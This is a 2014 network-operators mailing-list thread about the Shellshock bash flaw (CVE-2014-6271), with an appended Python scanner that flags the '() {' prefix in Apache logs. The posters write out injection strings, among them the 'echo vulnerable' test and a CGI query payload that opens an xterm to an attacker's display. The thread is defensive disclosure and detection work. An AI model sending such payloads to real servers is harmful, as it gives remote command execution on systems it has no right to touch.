As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example:

 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

- this really should not do what it actually does.


The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL then if the site CGI script executes _anything_ through bash, maybe even as innocuous as `date` - then that command in the URL gets executed. (I haven't verified that command yet, but you get the gist).

Even if your CGI scripts carefully sanitise and check inputs, there's still a hole there through hidden environment variables that can get executed.

--

Kerry

On 25/09/2014 14:41, Don Stokes wrote:

The fundamental problem is this:

In starting, bash treats ANY environment variable whose value starts with "() {" (i.e. open paren, close paren, space, open curly) as a function to be parsed and imported. For example:

$ export ls='() { echo bwahahaha ; }'
$ bash        # any invocation of bash, including from system(), or as /bin/sh
$ ls
bwahahaha

This is the mechanism by which bash's "export -f" (export function) works. (By default, functions are not exported to the environment, which is why you never noticed this before.)

Basically, that functionality has a ridiculous number of potential gotchas, even if the parsing is properly fixed. The unpatched code just blithely throws the string at the command interpreter, and the patches are just band-aids on top of that.

-- don


On 25/09/14 14:14, Nicholas Lee wrote:
Fix may not be complete either:

https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23

On Thu, Sep 25, 2014 at 11:06 AM, Sebastian Castro <sebastian@nzrs.net.nz> wrote:


On 25/09/14 10:57 am, Dean Pemberton wrote:
> Hi all,
> This isn't normally a security vuln release list but this one looks pretty bad
>
> A newly discovered vulnerability (CVE-2014-6271) in the Bash
> command-line interpreter poses a critical security risk to Unix and
> Linux systems.  It allows remote code execution.
>
> NZITF is responding to this remote execution exploit, with a News page
> that we will be keeping up to date - http://www.nzitf.org.nz/news.html
> .

There are active scans going on already:

http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html


>
> We are also reaching out to technical and security community points of
> contact to raise awareness to the issue and ensure necessary action is
> taken (hence this email to you).  Please note,  no patch is yet
> available for Mac OSX.  However, many other patches are available.
>
> So Patch, Patch, Patch.
>
>
> Regards,
> Dea
> _______________________________________________
> NZNOG mailing list
> NZNOG@list.waikato.ac.nz
> http://list.waikato.ac.nz/mailman/listinfo/nznog
>

--
Sebastian Castro
Technical Research Manager
.nz Registry Services (New Zealand Domain Name Registry Limited)
desk: +64 4 495 2337
mobile: +64 21 400535




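A defender-side check that follows from Don's description of the "() {" import prefix and Kerry's point that Apache hands request headers and the query string to CGI programs as environment variables: an added Python example, not code from the thread, that scans Apache combined-format access log lines for that prefix in the request line, Referer and User-Agent fields. The log lines are constructed samples, and the parsing assumes the standard "combined" LogFormat.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat (assumed):
#   host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The exact four characters bash checks for before importing an environment
# variable as a function. Headers reach CGI as HTTP_USER_AGENT, HTTP_REFERER
# etc.; the query string reaches it as QUERY_STRING.
MARKER = "() {"


def is_probe(field: str) -> bool:
    """True if the field carries the prefix raw or percent-encoded."""
    return MARKER in field or MARKER in unquote(field)


def find_shellshock_probes(lines):
    """Return (client host, field name, field value) for every hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format: skip, don't guess
        for name in ("request", "referer", "agent"):
            if is_probe(m.group(name)):
                hits.append((m.group("host"), name, m.group(name)))
    return hits


# Constructed sample lines, not real traffic. The payloads only echo a string.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:14:41:00 +1200] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:14:42:10 +1200] "GET /cgi-bin/status HTTP/1.1" 200 57 "-" "() { :;}; echo vulnerable"',
    '198.51.100.2 - - [25/Sep/2014:14:43:30 +1200] "GET /cgi-bin/status?foo=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" 404 210 "-" "curl/7.37"',
    '198.51.100.7 - - [25/Sep/2014:14:44:00 +1200] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo probe" "Wget/1.15"',
]

if __name__ == "__main__":
    for host, field, value in find_shellshock_probes(SAMPLE_LOG):
        print(f"{host}: suspicious {field}: {value!r}")
```

Only the request line, Referer and User-Agent are logged by default; Cookie and other headers that Apache also exports to CGI need to be added to the LogFormat before this kind of scan can see them.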